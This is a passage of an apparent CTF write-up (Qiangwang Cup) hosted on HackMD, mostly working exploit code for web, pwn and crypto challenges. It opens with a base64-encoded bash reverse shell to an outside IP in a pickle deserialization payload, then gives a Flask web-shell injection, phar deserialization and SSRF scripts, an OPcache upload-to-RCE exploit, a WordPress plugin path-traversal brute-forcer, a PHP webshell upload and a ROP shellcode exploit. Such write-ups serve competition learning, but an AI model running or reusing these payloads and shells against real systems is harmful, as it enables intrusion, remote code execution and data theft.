exec('YmFzaCAtaSAmPiAvZGV2L3RjcC8xNTAuMTU4LjE3Mi4xODIvNzc3NyAwPCYx'.decode('base64'))''' cmd = b'''sleep 70''' cmd = b'''app.add_url_rule('/shell123', 'shell123', lambda: __import__('os').popen(request.args.get('cmd', 'whoami')).read())''' cmd_len = str(hex(len(cmd))).replace("0x",r"\x").encode() print(cmd_len) # print(b'\x80\x03c__main__\nadmin\n}(X'+cmd_len + b'\x00\x00\x00'+cmd+b'ios\nsystem\n.') # payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x2d\x00\x00\x00'+cmd+b'ios\nsystem\n.') payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x30\x00\x00\x00'+cmd+b'ios\nsystem\n.') payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\xe9\x00\x00\x00'+cmd+b'ios\nsystem\n.') payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x61\x00\x00\x00'+cmd+b'ios\nsystem\n.') payload_byte = (b'\x80\x03capp\nadmin\n}(X\x08\x00\x00\x00'+cmd+b'ios\nsystem\n.') payload_byte = (b'\x80\x03capp\nadmin\n}(X\x24\x00\x00\x00'+cmd+b'ios\nsystem\n.') payload_byte = (b'\x80\x03capp\nadmin\n}(X\x23\x00\x00\x00'+cmd+b'ios\nsystem\n.') payload_byte = (b'\x80\x03c__main__\nadmin\n}(ctime\nsleep\nI70\no.') payload_byte = (b'\x80\x03capp\nadmin\n}(ctime\nsleep\nI70\no.') payload_byte = (b'\x80\x03capp\nadmin\n}(X\x09\x00\x00\x00'+cmd+b'ibuiltins\neval\n.') payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x0a\x00\x00\x00'+cmd+b'ibuiltins\neval\n.') payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x3e\x00\x00\x00'+cmd+b'ibuiltins\neval\n.') payload_byte = (b'\x80\x03capp\nadmin\n}(X\x73\x00\x00\x00'+cmd+b'ibuiltins\neval\n.') payload = pickletools.optimize(payload_byte) print(str(base64.b64encode(payload), encoding='utf-8')) ``` ``` GET /shell123?cmd=sleep+50 HTTP/1.1 Host: 123.56.86.227:39489 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` ### babyweb 修改admin的密码为123456 ,hint给了源码,python和go处理json的方式不同造成逻辑漏洞 ```htmlembedded <script> var ws = null; var url = "ws://127.0.0.1:8888/bot"; function sendtobot() { if (ws) { var msg = document.getElementById("sendbox").value; ws.send(msg); document.getElementById("sendbox").value = ""; document.getElementById("chatbox").append("你: " + msg + "\r\n"); } else{ ws = new WebSocket(url); ws.onopen = function (event) { console.log('connection open!') open("./connection open!") var msg = "changepw 123456"; ws.send(msg); document.getElementById("sendbox").value = ""; document.getElementById("chatbox").append("你: " + msg + "\r\n"); } ws.onmessage = function (ev) { botsay(ev.data); }; ws.onerror = function () { console.log("connection error"); }; ws.onclose = function () { console.log("connection close!"); }; } } function closeWebSocket() { if(ws){ ws.close(); ws = null; } } function botsay(content) { document.getElementById("chatbox").append("bot: " + content + "\r\n"); } sendtobot() </script> ``` post发包刷钱买flag ``` {"product":[{"id":1, "num" :0}, {"id":2, "num" :0}, {"id":1, " num" :-11000}], " product":[{"id":1, "num":0}, {"id":2, "num" :0}]} ``` ### easyweb 绕session上传 phar反序列化 curl ssrf 打内网 flag在 10.10.10.10:80 上 exp.py ```python from hashlib import sha1 import os import requests import base64 import time phpcode = "" with open("classser.php","r") as f: phpcode = f.read() def fuzz(payload): print(payload) phpcodefuzz = phpcode.replace("{{code}}",payload) r = requests.get("http://47.104.95.124:8080/") with open("tmp.php","w") as f: f.write(phpcodefuzz) text = os.popen("php tmp.php").read() time.sleep(1) f = open("phar.phar", "rb") dataa = f.read() f.close() file = dataa.replace(b'"AdminShow":4',b'"AdminShow":5') text = file[:-28] #读取开始到末尾除签名外内容 last = file[-8:] #读取最后8位的GBMB和签名flag new_file = text+sha1(text).digest() + last #生成新的文件内容,主要是此时Sha1正确了。 urll = "http://47.104.95.124:8080/upload.php" burp_proxy = { "http":"http://127.0.0.1:8080" } cooo = { "PHPSESSID":"a" } filee = {'file': ('newwwa.jpg', new_file, 'image/png')} dataa = { "PHP_SESSION_UPLOAD_PROGRESS":"123" } r = requests.post(url=urll,data=dataa,files=filee,cookies=cooo) filename = r.text[r.text.index("./")+2:r.text.index(" suc")] file_unse = f"http://47.104.95.124:8080/showfile.php?f=phar://{filename}/demo" r = requests.get(url=file_unse) # print(r.text) base = r.text[r.text.index("<img src=data:jpg;base64,")+len('<img src=data:jpg;base64,'):r.text.index(" /><img src=data:jpg;base64, />")] print(base64.b64decode(base).decode()) with open("asd.html",'w+') as f: f.write(base64.b64decode(base).decode()) if 2 == 1 : fuzz("file:///var/log/apache/access.log") else: fuzz("http://10.10.10.10:80/?url=file:///flag") ``` 反序列化classser.php ```php <?php ini_set('phar.readonly',0); class GuestShow{ public $file; public $contents; public function __construct($file) { $this->file=new AdminShow($file); } function __toString(){ $str = $this->file->name; return ""; } function __get($value){ return $this->$value; } function show() { $this->contents = file_get_contents($this->file); $src = "data:jpg;base64,".base64_encode($this->contents); echo "<img src={$src} />"; } function __destruct(){ echo $this; } } class AdminShow{ public $source; public $str; public $filter; public function __construct($file) { $this->source = ''; $this->schema = $file; } public function __toString() { $content = $this->str[0]->source; $content = $this->str[1]->schema; return $content; } public function __get($value){ $this->show(); return $this->$value; } public function __set($key,$value){ $this->$key = $value; } public function show(){ if(preg_match('/usr|auto|log/i' , $this->source)) { die("error"); } $url = $this->schema . $this->source; } public function __wakeup() { if ($this->schema !== 'file:///var/www/html/') { $this->schema = 'file:///var/www/html/'; } if ($this->source !== 'admin.png') { $this->source = 'admin.png'; } } } $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $o = new GuestShow("{{code}}"); echo serialize($o); $phar->setMetadata($o); $phar->addFromString("test.txt", "test"); $phar->stopBuffering(); ``` ### uploadpro /phpinfo.php 开了OPcache拓展 可以上传bin… http://eci.ichunqiu.com/uploads../ 目录穿越读文件读一下源码可以跨目录上传 先读index.php.bin获取时间戳 然后自己构造phpinfo.php.bin上传来rce 010 改时间戳 可以重放容器 内存缓存,上传前先不要访问phpinfo.php docker起一个php:7.4.3-apache 改改配置和题目相同 ``` docker run -itd -p 11015:80 -v ./ss:/var/www/html php:7.4.3-apache opcache.consistency_checks=0 opcache.dups_fix=Off opcache.enable=On opcache.enable_cli=On opcache.enable_file_override=Off opcache.file_cache=/tmp/opcache opcache.file_cache_consistency_checks=1 opcache.file_cache_only=0 opcache.file_update_protection=2 opcache.force_restart_timeout=180 opcache.huge_code_pages=Off opcache.interned_strings_buffer=8 opcache.lockfile_path=/tmp opcache.log_verbosity_level=1 opcache.max_accelerated_files=10000 opcache.max_file_size=0 opcache.max_wasted_percentage=5 opcache.memory_consumption=128 opcache.opt_debug_level=0 opcache.optimization_level=0x7FFEBFFF opcache.protect_memory=0 opcache.revalidate_freq=2 opcache.revalidate_path=Off opcache.save_comments=1 opcache.use_cwd=On opcache.validate_permission=Off opcache.validate_root=Off opcache.validate_timestamps=On ``` exp.py ```python #!/usr/bin/python3 import requests import os urll = "http://url/" datad = None with open('/home/ubuntu/test/ss/phpinfo.php.bin', 'rb') as f: datad = f.read() filess = {'file': ('phpinfo.php.bin', datad, 'image/png')} r = requests.post(url=urll+"index.php?prefix=../../../../../../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/",files=filess) # print(r.text) # print(r.content) r = requests.get(url=urll+"uploads../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/phpinfo.php.bin") print(r.content==datad) # print(urll+"uploads../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/index.php.bin") # print(r.content) ``` ## 强网先锋 ### WP-UM 根据题目来的话就是User Meta这个插件了 User Meta:2.4.3 https://wpscan.com/vulnerability/9d4a3f09-b011-4d87-ab63-332e505cf1cd pf-nonce 去 http://eci-2zea7reemywzfen5krqa.cloudeci1.ichunqiu.com/index.php/login/ 页面f12刷一个pf_nonce ```python import requests import string burp0_url = "http://url:80/wp-admin/admin-ajax.php" burp0_cookies = { "Hm_lvt_2d0601bd28de7d49818249cf35d95943": "1653791821,1655028229,1655379686,1655471106"} burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} print(string.ascii_letters) res = "MaoGePaMao" res = "MaoGeYaoQiFeiLa" for i in range(15,16): for j in string.ascii_letters: # filename = "username/"+str(i)+j filename = "password/"+str(i)+j print(filename) burp0_data = {"field_name": "test", "filepath": "/../../../../../../../../"+filename, "field_id": "um_field_4", "form_key": "Upload", "action": "um_show_uploaded_file", "pf_nonce": "39a16c8deb", "is_ajax": "true"} r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) if "um_remove_file" in r.text: res += j print(res) break ``` 爆密码 登上后台写马 cat /usr/local/This_1s_secert ### rcefile spl_autoload_register 文件和inc类同名 ```python import requests import time import hashlib import re proxies = {"http":"http://127.0.0.1:8080"} for i in range(1): # print(time.time()) timeee = str(int(time.time())) # print(int(time.time())) # print(timeee) # print(timeee.encode()) h = hashlib.md5() h.update(timeee.encode()) md5name = h.hexdigest() print(md5name) burp0_url = "http://eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com/upload.php" burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx6dML4ocEqShnX50"} burp0_data = "------WebKitFormBoundaryx6dML4ocEqShnX50\r\nContent-Disposition: form-data; name=\"file\"; filename=\"popko3.inc\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\nclass " + \ md5name + \ "{\r\n\tfunction __wakeup()\r\n {\r\n system($_GET[1]);\r\n }\r\n}\r\n------WebKitFormBoundaryx6dML4ocEqShnX50--\r\n" r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies) results = re.search(r"file: (.*)\.inc", r.text) # print() # print(r.text) print(results.group(1)) print(md5name == results.group(1)) ``` ``` GET /showfile.php?1=cat+/flag HTTP/1.1 Host: eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com/upload.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1653791821,1655028229,1655379686,1655471106; userfile=O:32:"cdf056f0b857b3651ce22a891cfa7599":0:{} Connection: close ``` ### polydiv ``` sage: P.<x> = GF(2)[] sage: r = x^14 + x^12 + x^10 + x^8 + x^6 + x^5 + x^4 + x^2 + 1 ....: a = x^7 + x^6 + x^3 + x + 1 ....: c = x^6 + x^2 sage: (r-c)/a x^7 + x^6 + x^2 + x + 1 ``` ### ASR 分解n,有限域开根,中国剩余定理 ``` sage: p1 = 218566259296037866647273372633238739089 sage: p2 = 260594583349478633632570848336184053653 sage: p3 = 225933944608558304529179430753170813347 sage: p4 = 223213222467584072959434495118689164399 sage: n == (p1*p2*p3*p4)^2 True sage: P.<m> = PolynomialRing(Zmod(p1),implementation='NTL') ....: f = m^e-c ....: roots1 = [r[0] for r in f.monic().roots()] ....: P.<m> = PolynomialRing(Zmod(p2),implementation='NTL') ....: f = m^e-c ....: roots2 = [r[0] for r in f.monic().roots()] ....: P.<m> = PolynomialRing(Zmod(p3),implementation='NTL') ....: f = m^e-c ....: roots3 = [r[0] for r in f.monic().roots()] ....: P.<m> = PolynomialRing(Zmod(p4),implementation='NTL') ....: f = m^e-c ....: roots4 = [r[0] for r in f.monic().roots()] sage: for r1 in roots1: ....: for r2 in roots2: ....: for r3 in roots3: ....: for r4 in roots4: ....: res = long_to_bytes(crt([ZZ(r1), ZZ(r2), ZZ(r3), ZZ(r4)], [p1, p2, p3, p4])) ....: if b'flag{' in res: ....: print(res) ....: b'flag{Fear_can_hold_you_prisoner_Hope_can_set_you_free}\x06\x06\x06\x06\x06\x06' ``` ### devnull 栈迁移, 最后的输出‘Thanks\x0a’刚刚好能让rdx变为7,所以利用mprotect的gadget来使得程序的段变得可读可写执行,最后执行shellcode ```python= from pwn import * context.arch = 'amd64' # p = process("./devnull") p = remote("59.110.212.61",26182) context.terminal = ['tmux', 'splitw', '-h'] # gdb.attach(p,"b *0x401436") p.recvuntil("please input your filename\n") p.sendline("A"*0x1f) fake_buf = 0x3fe000 leave_ret = 0x0401511 # 0x0000000000401350: mov rax, qword ptr [rbp - 0x18]; leave; ret; mov_rax_leave_ret = 0x0000000000401350 p.recvuntil("Please write the data you want to discard\n") p.send(b"A"*0x14+p64(fake_buf)+p64(fake_buf)+p64(leave_ret)) p.recvuntil("please input your new data\n") rop_chain = p64(fake_buf+0x10+0x18) + p64(mov_rax_leave_ret) rop_chain += p64(fake_buf) rop_chain += p64(0xcafe)*2 rop_chain += p64(fake_buf+0x100) + p64(0x4012D0) rop_chain += p64(fake_buf+0x48)*2 # >>> asm('mov rsi,rdi;xor rdi,rdi;mov rdx,r11;syscall').encode('hex') # '4889fe4831ff4c89da0f05' rop_chain += b''.fromhex('4889fe4831ff4c89da0f05') p.send(rop_chain) p.recvuntil('Thanks') p.send(b'\x90'*0x70+asm(shellcraft.sh())) p.interactive() ``` 拿到shell后,还要exec >&2,这样就可以用错误流输出了

    Import from clipboard

    Paste your markdown or webpage here...

    Advanced permission required

    Your current role can only read. Ask the system administrator to acquire write and comment permission.

    This team is disabled

    Sorry, this team is disabled. You can't edit this note.

    This note is locked

    Sorry, only owner can edit this note.

    Reach the limit

    Sorry, you've reached the max length this note can be.
    Please reduce the content or divide it to more notes, thank you!

    Import from Gist

    Import from Snippet

    or

    Export to Snippet

    Are you sure?

    Do you really want to delete this note?
    All users will lose their connection.

    Create a note from template

    Create a note from template

    Oops...
    This template has been removed or transferred.
    Upgrade
    All
    • All
    • Team
    No template.

    Create a template

    Upgrade

    Delete template

    Do you really want to delete this template?
    Turn this template into a regular note and keep its content, versions, and comments.

    This page need refresh

    You have an incompatible client version.
    Refresh to update.
    New version available!
    See releases notes here
    Refresh to enjoy new features.
    Your user state has changed.
    Refresh to load new user state.

    Sign in

    Forgot password

    or

    By clicking below, you agree to our terms of service.

    Sign in via Facebook Sign in via Twitter Sign in via GitHub Sign in via Dropbox Sign in with Wallet
    Wallet ( )
    Connect another wallet

    New to HackMD? Sign up

    Help

    • English
    • 中文
    • Français
    • Deutsch
    • 日本語
    • Español
    • Català
    • Ελληνικά
    • Português
    • italiano
    • Türkçe
    • Русский
    • Nederlands
    • hrvatski jezik
    • język polski
    • Українська
    • हिन्दी
    • svenska
    • Esperanto
    • dansk

    Documents

    Help & Tutorial

    How to use Book mode

    Slide Example

    API Docs

    Edit in VSCode

    Install browser extension

    Contacts

    Feedback

    Discord

    Send us email

    Resources

    Releases

    Pricing

    Blog

    Policy

    Terms

    Privacy

    Cheatsheet

    Syntax Example Reference
    # Header Header 基本排版
    - Unordered List
    • Unordered List
    1. Ordered List
    1. Ordered List
    - [ ] Todo List
    • Todo List
    > Blockquote
    Blockquote
    **Bold font** Bold font
    *Italics font* Italics font
    ~~Strikethrough~~ Strikethrough
    19^th^ 19th
    H~2~O H2O
    ++Inserted text++ Inserted text
    ==Marked text== Marked text
    [link text](https:// "title") Link
    ![image alt](https:// "title") Image
    `Code` Code 在筆記中貼入程式碼
    ```javascript
    var i = 0;
    ```    		 
    var i = 0;
    :smile: :smile: Emoji list
    {%youtube youtube_id %} Externals
    $L^aT_eX$ LaTeX
    :::info
    This is a alert area.
    :::

    This is a alert area.
    Versions and GitHub Sync
    Get Full History Access

    • Edit version name
    • Delete

    revision author avatar     named on  

    More Less

    Note content is identical to the latest version.
    Compare
      Choose a version
      No search result
      Version not found
    Sign in to link this note to GitHub
    Learn more
    This note is not linked with GitHub
     

    Feedback

    Submission failed, please try again

    Thanks for your support.

    On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

    Please give us some advice and help us improve HackMD.

     

    Thanks for your feedback

    Remove version name

    Do you want to remove this version name and description?

    Transfer ownership

    Transfer to
      Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

        Link with GitHub

        Please authorize HackMD on GitHub
        • Please sign in to GitHub and install the HackMD app on your GitHub repo.
        • HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.
        Learn more  Sign in to GitHub

        Push the note to GitHub Push to GitHub Pull a file from GitHub

          Authorize again
         

        Choose which file to push to

        Select repo
        Refresh Authorize more repos
        Select branch
        Select file
        Select branch
        Choose version(s) to push
        • Save a new version and push
        • Choose from existing versions
        Include title and tags
        Available push count

        Pull from GitHub

         
        File from GitHub
        File from HackMD

        GitHub Link Settings

        File linked

        Linked by
        File path
        Last synced branch
        Available push count

        Danger Zone

        Unlink
        You will no longer receive notification when GitHub file changes after unlink.

        Syncing

        Push failed

        Push successfully